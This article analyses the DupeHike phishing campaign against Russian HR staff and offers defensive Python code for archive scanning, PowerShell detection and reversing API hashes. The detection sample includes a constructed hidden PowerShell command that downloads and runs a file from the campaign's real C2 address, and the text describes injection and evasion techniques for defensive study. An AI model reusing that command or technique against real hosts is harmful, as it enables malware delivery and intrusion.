Operation DupeHike: New Sophisticated Cyber Threat Targets Russian Corporate Sectors

Operation DupeHike is a spear-phishing campaign, attributed by Seqrite to a threat group it tracks as UNG0902, that targets Russian corporate environments and, within them, employees in human resources, payroll and administrative departments. The lures are decoy documents about employee bonuses and internal financial policy; their job is to get a shortcut file opened so that a previously undocumented malware chain can be deployed.

The Deceptive Entry Point

The attack begins with spear-phishing emails carrying ZIP archives that pose as routine corporate paperwork. The archives bear names such as Премия 2025.zip ("Bonus 2025.zip") and contain Windows shortcut files (.LNK) named to look like PDFs, for example Document_1_On_the_size_of_the_annual_bonus.pdf.lnk. The trick works because Windows Explorer never displays the .lnk extension, even when other extensions are shown, so the recipient sees a file ending in .pdf, and a shortcut can carry a PDF icon, with only the small overlay arrow hinting that it is a link rather than a document.
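The archive-level check a mail gateway or sandbox would apply to such a lure, as an added example that is not part of the original report or of Seqrite's tooling: it scans a ZIP held in memory, recurses into nested archives, decodes Cyrillic entry names correctly, and flags shortcut or executable entries, with a double extension such as .pdf.lnk called out separately. The archive it scans is constructed here from the file names the report gives; its contents are inert placeholders, not a real shortcut.

```python
from __future__ import annotations

import io
import zipfile

# Entry types Windows will execute on double-click; none belongs in an HR
# document archive. Shortcut files (.lnk) are the DupeHike lure.
EXECUTABLE_EXTENSIONS = {
    ".lnk", ".exe", ".scr", ".js", ".jse", ".vbs", ".vbe", ".wsf",
    ".hta", ".bat", ".cmd", ".ps1", ".url",
}
# Extensions an attacker places in front of the real one (.pdf.lnk, .docx.exe).
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt"}


def decoded_name(info: zipfile.ZipInfo) -> str:
    """Return an entry name as text.

    zipfile decodes names as UTF-8 only when general-purpose flag bit 11 is
    set; otherwise it uses cp437, which mangles Cyrillic names such as
    'Премия 2025'. Try to recover UTF-8 for those entries.
    """
    if info.flag_bits & 0x800:
        return info.filename
    try:
        return info.filename.encode("cp437").decode("utf-8")
    except UnicodeError:
        return info.filename


def suffixes(name: str) -> list[str]:
    """All extensions of the last path component, lower-cased: 'a.pdf.lnk' -> ['.pdf', '.lnk']."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return ["." + p for p in parts[1:]]


def classify_entry(name: str) -> str | None:
    """Label a suspicious archive entry, or return None for an ordinary document."""
    exts = suffixes(name)
    if not exts or exts[-1] not in EXECUTABLE_EXTENSIONS:
        return None
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTENSIONS:
        return f"double-extension executable ({exts[-2]}{exts[-1]})"
    return f"executable entry ({exts[-1]})"


def scan_archive(data: bytes, depth: int = 0, max_depth: int = 2) -> list[tuple[str, str]]:
    """Scan an in-memory ZIP, recursing into nested ZIPs up to max_depth.

    Returns (entry path, finding) pairs. The depth limit keeps a nested
    archive bomb from driving unbounded recursion.
    """
    findings: list[tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = decoded_name(info)
            label = classify_entry(name)
            if label:
                findings.append((name, label))
            if name.lower().endswith(".zip") and depth < max_depth:
                for inner, inner_label in scan_archive(zf.read(info), depth + 1, max_depth):
                    findings.append((f"{name}/{inner}", inner_label))
    return findings


def build_sample_archive() -> bytes:
    """Constructed lure: an outer ZIP wrapping 'Премия 2025.zip' with the names
    the report describes. Contents are inert placeholders, not real malware."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("Document_1_On_the_size_of_the_annual_bonus.pdf.lnk", b"placeholder, not a shortcut")
        zf.writestr("Bonus_policy_2025.pdf", b"%PDF-1.4 placeholder")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("Премия 2025.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for path, finding in scan_archive(build_sample_archive()):
        print(f"{finding}: {path}")
```

The extension lists are a starting point, not a complete policy; a gateway should also treat password-protected archives and container formats it cannot open as blocked rather than clean, since the scanner cannot see their entries.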

Seqrite analysts uncovered the campaign on November 21, 2025, after a malicious ZIP archive was identified on VirusTotal. Their analysis showed that the actors understand Russian corporate HR workflows in detail: the decoy documents describe realistic bonus structures tied to performance metrics, key performance indicators (KPIs) and organizational goals, cite Russia's Labor Code, and set a default bonus of fifteen percent of annual salary, which makes them convincing to the finance and HR staff they are aimed at.

Unraveling the Infection Mechanism

The chain has three stages. Opening the shortcut launches powershell.exe with the flags -NoNI (non-interactive), -nop (no profile) and -w hidden (hidden window), so no console appears on screen. The script uses Invoke-WebRequest to download the second stage, an implant Seqrite names DUPERUNNER, from an attacker-controlled server at 46.149.71.230.
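Detection logic for that stage-1 launch, added here as an example and not taken from the report: it scores process-creation records (the fields Sysmon event 1 or Security event 4688 provide) on the traits described above, hidden window, no profile, non-interactive, a download cmdlet and a URL with a raw IP literal, and treats a match on the published C2 address as decisive. The three sample events are constructed to exercise the scoring; only the address 46.149.71.230 comes from the report.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicator taken from the Seqrite report; everything else here is constructed.
KNOWN_C2 = {"46.149.71.230"}

# (trait name, pattern, weight): one entry per trait of the stage-1 command line.
TRAITS = [
    ("hidden-window", re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b"), 2),
    ("no-profile", re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"), 1),
    ("non-interactive", re.compile(r"(?i)(?:^|\s)-noni(?:nteractive)?\b"), 1),
    ("exec-policy-bypass", re.compile(r"(?i)(?:^|\s)-e(?:p|xecutionpolicy)\s+bypass\b"), 1),
    ("encoded-command", re.compile(r"(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"), 2),
    ("download-cmdlet", re.compile(
        r"(?i)\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile|Start-BitsTransfer)\b"), 2),
    ("url-ip-literal", re.compile(r"(?i)https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?=[/\s\"']|$)"), 2),
]
IP_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
SUSPICIOUS_THRESHOLD = 4


@dataclass
class ProcessEvent:
    """Minimal process-creation record; Sysmon event 1 and Security 4688 carry these fields."""
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    score: int = 0
    traits: list[str] = field(default_factory=list)
    ioc_hits: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A known C2 address is decisive on its own; otherwise require several traits.
        return bool(self.ioc_hits) or self.score >= SUSPICIOUS_THRESHOLD


def is_powershell(image: str) -> bool:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() in {"powershell.exe", "pwsh.exe"}


def score_event(ev: ProcessEvent) -> Verdict:
    v = Verdict()
    if not is_powershell(ev.image):
        return v
    for name, pattern, weight in TRAITS:
        if pattern.search(ev.command_line):
            v.traits.append(name)
            v.score += weight
    # A shortcut double-clicked in Explorer (or in an archive opened through it)
    # gives explorer.exe as the parent of powershell.exe.
    if ev.parent_image.lower().endswith("\\explorer.exe"):
        v.traits.append("explorer-parent")
        v.score += 1
    v.ioc_hits = sorted({ip for ip in IP_RE.findall(ev.command_line) if ip in KNOWN_C2})
    return v


def triage(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, Verdict]]:
    """Return only the events worth an analyst's time, with their verdicts."""
    hits = []
    for ev in events:
        verdict = score_event(ev)
        if verdict.suspicious:
            hits.append((ev, verdict))
    return hits


# Constructed sample events: the first is shaped like the stage-1 launch the
# report describes; none of them is a captured log line.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'powershell.exe -NoNI -nop -w hidden -c "Invoke-WebRequest -Uri http://46.149.71.230/update -OutFile $env:TEMP\svc.exe; Start-Process $env:TEMP\svc.exe"',
    ),
    ProcessEvent(  # routine admin use: visible window, local script, no download
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\rotate-logs.ps1",
    ),
    ProcessEvent(  # not PowerShell at all
        r"C:\Windows\explorer.exe",
        r"C:\Program Files\Adobe\Acrobat.exe",
        r'"Acrobat.exe" C:\Users\hr\Downloads\bonus.pdf',
    ),
]

if __name__ == "__main__":
    for ev, verdict in triage(SAMPLE_EVENTS):
        print(f"score={verdict.score} traits={verdict.traits} ioc={verdict.ioc_hits}\n  {ev.command_line}")
```

The weights and threshold are assumptions to tune against your own baseline; the point of scoring rather than matching a single string is that the operators can rename the payload or change the IP, but a hidden, profile-less, non-interactive PowerShell started by Explorer that immediately downloads something is rare in legitimate use.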

DUPERUNNER is a compiled C++ implant that handles reconnaissance and injection while keeping its own footprint small and maintaining a foothold on the host. It enumerates running processes to find an injection target, choosing among explorer.exe, notepad.exe and msedge.exe, all of them ordinary long-lived processes on a workstation. In parallel it downloads the decoy PDF and opens it for the user, so the victim sees the bonus document they expected and has no reason to suspect anything.

It then uses remote thread injection to run the final payload inside that process: a beacon for AdaptixC2, an open-source post-exploitation framework. The beacon communicates with the operator's infrastructure over HTTP POST requests and provides remote command execution and data exfiltration. To avoid static signatures on import names, it resolves the Windows API functions it needs at runtime by comparing djb2-style hashes of export names rather than importing them by name.
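How hash-based API resolution works and how an analyst reverses it, as an added example rather than code from the beacon or the report: the beacon stores a 32-bit hash of each Windows export name instead of the name, walks a module's export table at runtime hashing every name until one matches, and so carries no import strings for a scanner to find. The analyst's countermeasure is to pre-hash candidate export names under the likely variants and look up the constants lifted from the binary. The exact variant the beacon uses (seed, case handling, whether the module name is mixed in) is not stated in the report, so the two classic djb2 forms below are assumptions, and the API name list is a short illustrative one.

```python
from __future__ import annotations

from typing import Callable, Iterable

MASK32 = 0xFFFFFFFF


def djb2(name: str, seed: int = 5381) -> int:
    """Canonical djb2: h = h * 33 + c, kept to 32 bits as a native implant would."""
    h = seed
    for b in name.encode("ascii"):
        h = (h * 33 + b) & MASK32
    return h


def djb2_xor(name: str, seed: int = 5381) -> int:
    """Bernstein's second form: h = (h * 33) ^ c."""
    h = seed
    for b in name.encode("ascii"):
        h = ((h * 33) ^ b) & MASK32
    return h


VARIANTS: dict[str, Callable[[str], int]] = {"djb2": djb2, "djb2-xor": djb2_xor}

# Export names worth pre-hashing for an implant that downloads, enumerates
# processes and injects; a full table would be built from the real export
# directories of kernel32, ntdll and wininet rather than this list.
API_NAMES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualAllocEx",
    "VirtualProtect", "WriteProcessMemory", "CreateRemoteThread", "OpenProcess",
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
    "InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA",
    "NtCreateThreadEx", "RtlCreateUserThread",
]


def build_table(names: Iterable[str], variants=VARIANTS, case_variants: bool = True) -> dict[tuple[str, int], str]:
    """Map (variant, hash) -> export name.

    Many hashers lower- or upper-case the name first, so those forms are
    hashed too and still resolve to the canonical export name.
    """
    table: dict[tuple[str, int], str] = {}
    for name in names:
        forms = {name, name.lower(), name.upper()} if case_variants else {name}
        for form in forms:
            for variant, fn in variants.items():
                table[(variant, fn(form))] = name
    return table


def resolve(hash_value: int, table: dict[tuple[str, int], str]) -> list[tuple[str, str]]:
    """Return every (variant, export name) whose hash equals a constant lifted from the binary."""
    wanted = hash_value & MASK32
    return sorted((variant, name) for (variant, h), name in table.items() if h == wanted)


if __name__ == "__main__":
    table = build_table(API_NAMES)
    # Stand-ins for constants read out of the beacon's resolver loop.
    for constant in (djb2("CreateRemoteThread"), djb2_xor("writeprocessmemory"), 0xDEADBEEF):
        print(f"0x{constant:08X} -> {resolve(constant, table) or 'no match'}")
```

If none of the constants in a sample resolve, the hasher is a different one: try another seed, hash the lower-cased name, fold in the DLL name, or check whether the loop is a rotate-and-add scheme such as ROR-13 before assuming any djb2 form. The resolved names are also the cheapest behavioural signature available, since a resolver that looks up OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread in sequence describes remote thread injection whatever the surrounding code looks like.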

Decoding the Command-and-Control Infrastructure

Seqrite extracted configuration artifacts from the beacon that revealed beacon identifiers and command-and-control servers hosted at VDSINA (AS 48282) and TIMEWEB (AS 9123). The infrastructure uses port 80 for delivering the implant and port 443 for the final beacon traffic, a change between stages that shows the operators tuning their setup. For defenders the practical point is that the port is not a reliable selector: block and hunt on the C2 addresses regardless of port, and do not assume that a connection to port 443 from an injected process is ordinary TLS.

The Broader Implications

Operation DupeHike pairs tailored social engineering with a multi-stage implant to reach a specific audience: the HR, payroll and administrative staff of Russian companies, who handle sensitive employee and financial data and who routinely open exactly the kind of bonus paperwork the lure imitates.

This operation is not an isolated incident. Similar campaigns have been observed targeting various sectors and regions. For instance, the Payroll Pirates network has been hijacking payroll systems across the United States since mid-2023, using malvertising to trick employees into visiting phishing websites and stealing their login credentials. This operation has targeted over 200 different platforms and compromised more than 500,000 users. ([cybersecuritynews.com](https://cybersecuritynews.com/payroll-pirates-network-of-criminal-groups/?utm_source=openai))

Another notable campaign is Operation CargoTalon, reported in late June 2025, which targets Russia's aerospace and defense sector through spear-phishing and a multi-stage infection chain that deploys EAGLET, a custom DLL backdoor capable of remote command execution and data exfiltration. ([cybersecuritynews.com](https://cybersecuritynews.com/operation-cargotalon-attacking-russian-aerospace/?utm_source=openai))

These campaigns share a pattern: rather than spraying an organization, the actors pick the department whose daily work the lure mimics and build both the social engineering and the malware chain around it.

Mitigation Strategies and Recommendations

To defend against such sophisticated attacks, organizations should implement a multi-layered security approach:

1. Employee Training and Awareness: Show HR, payroll and administrative staff this specific lure. A bonus or payroll document that arrives as a ZIP archive, a "PDF" whose icon carries a shortcut arrow, or a document that opens nothing visible while the disk or network is busy should each be reported rather than shrugged off.

2. Email Filtering and Security Measures: Block or quarantine archives that contain shortcut (.lnk) entries or other executable content (.exe, .js, .vbs, .hta, .bat, .ps1) at the mail gateway, including inside nested archives, and make sure the archive tools in use propagate the Mark-of-the-Web to extracted files so SmartScreen and document viewers treat them as untrusted.

3. Endpoint Detection and Response (EDR): Alert on powershell.exe started by explorer.exe with -w hidden, -nop or -NoNI and a download cmdlet such as Invoke-WebRequest in its command line; on remote thread creation (Sysmon event 8) into explorer.exe, notepad.exe or msedge.exe; and on binaries in user-writable paths making outbound HTTP connections. Turn on PowerShell script block logging (event 4104) and command-line auditing for process creation (event 4688) so these signals exist in the first place, and consider the Microsoft Defender attack surface reduction rule that blocks executable content from email clients and webmail.

4. Regular Software Updates: Keep systems patched, but note that this chain exploits no software vulnerability; it relies entirely on a user opening a shortcut, so patching limits what a later stage can do rather than preventing the initial execution.

5. Network Segmentation and Egress Control: Segment the network so a compromised HR workstation cannot reach payroll or identity systems directly, and route workstation web traffic through a proxy that alerts on or blocks connections to bare IP addresses; both the stage-2 download and the beacon in this campaign use a raw IP rather than a domain. Block the published C2 addresses on every port, since both 80 and 443 were seen, so the operator loses the channel even if the implant runs.

6. Incident Response Planning: Maintain a tested plan that covers this scenario: isolate the host, capture memory of the injected process before remediation (the beacon lives inside explorer.exe, notepad.exe or msedge.exe and leaves less on disk than a conventional dropper), and hunt across the estate for the published indicators (46.149.71.230 and the VDSINA- and TIMEWEB-hosted C2 servers) and for the PowerShell launch pattern.

Taken together, these measures address each stage of DupeHike: the lure at the gateway and in the user's hands, the PowerShell launch at the endpoint, and the beacon at the network edge.